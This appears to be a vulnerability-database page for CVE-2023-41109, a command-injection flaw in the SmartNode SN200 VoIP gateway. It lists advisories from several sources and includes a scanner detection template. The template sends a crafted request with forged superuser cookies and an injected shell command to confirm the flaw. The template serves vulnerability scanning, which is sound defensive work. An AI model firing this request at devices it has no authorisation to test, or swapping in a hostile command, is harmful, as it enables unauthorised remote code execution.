| Reporter | Title | Published | Views |
|---|---|---|---|
| zdt | SmartNode SN200 3.21.2-23021 OS Command Injection Vulnerability | 28 Nov 2023 00:00 | – |
| attackerkb | CVE-2023-41109 | 28 Aug 2023 20:15 | – |
| bdu_fstec | The vulnerability of the Network Diagnostic Commands function in the microprogramming software of the SmartNode SN200 adapter allows a perpetrator to compromise the confidentiality, integrity, and accessibility of the protected information. | 22 Jan 2024 00:00 | – |
| circl | CVE-2023-41109 | 29 Aug 2023 00:16 | – |
| cnnvd | SySS SmartNode SN200 OS Command Injection Vulnerability | 28 Aug 2023 00:00 | – |
| cve | CVE-2023-41109 | 28 Aug 2023 00:00 | – |
| cvelist | CVE-2023-41109 | 28 Aug 2023 00:00 | – |
| nvd | CVE-2023-41109 | 28 Aug 2023 20:15 | – |
| osv | CVE-2023-41109 | 28 Aug 2023 20:15 | – |
| packetstorm | SmartNode SN200 3.21.2-23021 OS Command Injection | 28 Nov 2023 00:00 | – |

```yaml
id: CVE-2023-41109

info:
  name: SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway - Command Injection
  author: princechaddha
  severity: critical
  description: |
    The SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway is vulnerable to command injection.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device.
  remediation: |
    Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
  reference:
    - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-019.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2023-41109
    - http://packetstormsecurity.com/files/175945/SmartNode-SN200-3.21.2-23021-OS-Command-Injection.html
    - http://seclists.org/fulldisclosure/2023/Nov/12
    - https://www.syss.de/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-41109
    cwe-id: CWE-78
    epss-score: 0.64113
    epss-percentile: 0.99128
    cpe: cpe:2.3:h:patton:smartnode_sn200:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: patton
    product: smartnode_sn200
  tags: cve,cve2023,smartnode,voip,patton,vkev,vuln

variables:
  payload: "echo CVE-2023-41109 | md5sum"

http:
  - raw:
      - |
        POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1
        Host: {{Hostname}}
        Cookie: AuthToken=; AuthGroup=superuser; UserName=admin

        {"cmd":"{{payload}}","arguments":[]}

    matchers:
      - type: word
        part: body
        words:
          - "dd556350275e2ee0a2e877cea9c8a74a"
# digest: 490a0046304402206ab34e862ddbcaddcd175680c73e908f8d53d3f85209d190062a15e2b823fbcd02203dd371bf1a6a20a26c9de090c8322784770cc3bae2f215241b54379b569fc681:922c64590222798bb761d5b6d8e72950
```